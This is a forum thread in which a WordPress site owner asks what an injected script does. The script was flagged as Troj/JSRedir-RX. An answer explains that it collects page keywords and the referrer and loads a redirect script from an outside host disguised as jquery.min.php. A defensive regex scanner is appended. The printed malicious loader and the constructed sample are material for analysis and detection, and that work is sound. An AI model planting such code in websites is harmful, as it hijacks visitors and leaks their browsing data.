JavaScript
Yermek, 2016-06-23 07:19:18

What does this virus do?

Good day everyone.
After the next WordPress update, Yandex swore at my site for the presence of the Troj/JSRedir-RX virus. Armed with the built-in editor and Chrome, I found the following code on my page (I added the checkOne function myself to make it easier to read).
Well, the subject itself.

function checkOne()
{
  var keywords='';
  var metas=document.getElementsByTagName('meta');
  if(metas)
  {
    for(var x=0,y=metas.length;x<y;x++)
    {
      if(metas[x].name.toLowerCase()=="keywords")
      {
        keywords+=metas[x].content;
        }
    }
  }
  return keywords!==''?keywords:null;
}

  var a='';
  setTimeout(10);
  if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
    ||document.referrer!==undefined||document.referrer!==''
    ||document.referrer!==null){
      document.write('<script type="text/javascript" 
          src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm='
          +encodeURIComponent('http://ktm-pohlenz.de/js/jquery.min.php'+'?'
          +'default_keyword='
          +encodeURIComponent(
            (
              (k=checkOne())==null?(
                v=window.location.search.match(/utm_term=([^&]+)/))==null?
                  (t=document.title)==null?'':t
                :v[1]
              :k))
              +'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}


1 answer(s)
Cat Anton, 2016-06-23
@ermek6

1. The function checkOne() gets the keywords from the tag <meta name="keywords" content="..." />.
2. If the keywords are not found, then the script takes the keywords from utm_term.
3. If key phrases from utm_term are not found, then the title of the page is used.
The found keywords are encoded and sent to ktm-pohlenz.de/js/jquery.min.php. As a result, JavaScript is inserted that redirects the user to the URL that best matches the found keywords and the page's HTTP referer. Example for this page:
PS: The redirect is not always returned. Perhaps there is some kind of filtering on the side of ktm-pohlenz.de by IP, UA, c_utt parameter, etc.
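
A static check for the kind of injected loader analysed in this thread, as an added example that is not part of the original question or answer. The parameter names are the ones in the posted snippet; the indicator weights, the threshold, the function names and the sample hosts are assumptions made for the illustration.

```javascript
// Added example: heuristic scan of a theme/plugin file or rendered page for the
// injected redirect loader discussed above. Weights and threshold are assumptions.
const INDICATORS = [
  { id: 'doc-write-script', weight: 2, re: /document\.write\s*\(\s*['"]<script/i },
  { id: 'split-close-tag',  weight: 2, re: /<['"]\s*\+\s*['"]\/script>/i },
  { id: 'fake-jquery-php',  weight: 3, re: /jquery(?:\.min)?\.php/i },
  { id: 'redirect-params',  weight: 3, re: /(?:default_keyword|se_referrer|c_utm)=/ },
  { id: 'referrer-leak',    weight: 1, re: /encodeURIComponent\s*\(\s*document\.referrer/ },
];

// Collect hosts of absolute URLs that are not the site's own host,
// so they can be searched for in proxy/DNS logs or blocklisted.
function remoteHosts(source, ownHost) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const h = m[1].toLowerCase();
    if (h !== ownHost.toLowerCase()) hosts.add(h);
  }
  return [...hosts].sort();
}

function scanForRedirector(source, ownHost, threshold = 6) {
  // The loader is often spread over several lines; collapse whitespace first.
  const flat = source.replace(/\s+/g, ' ');
  const hits = INDICATORS.filter(i => i.re.test(flat));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  return {
    score,
    suspicious: score >= threshold,
    indicators: hits.map(i => i.id),
    hosts: remoteHosts(flat, ownHost),
  };
}

// Constructed samples (not from a real site): an injected loader and a normal include.
const injected = `if(document.referrer!==''){document.write('<script type="text/javascript"
  src="http://cdn.example.invalid/js/jquery.min.php?c_utt=X1&c_utm='
  +encodeURIComponent('http://cdn.example.invalid/js/jquery.min.php?default_keyword='
  +encodeURIComponent(document.title)+'&se_referrer='+encodeURIComponent(document.referrer))
  +'"><'+'/script>');}`;
const clean = `<script src="https://myblog.example/wp-includes/js/jquery/jquery.min.js"></script>`;

console.log(scanForRedirector(injected, 'myblog.example'));
console.log(scanForRedirector(clean, 'myblog.example'));
```

A hit only tells you which file to inspect; the injected block still has to be removed from the theme, plugin or database entry it was written into, and the hosts it reports can be searched for in outbound logs.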
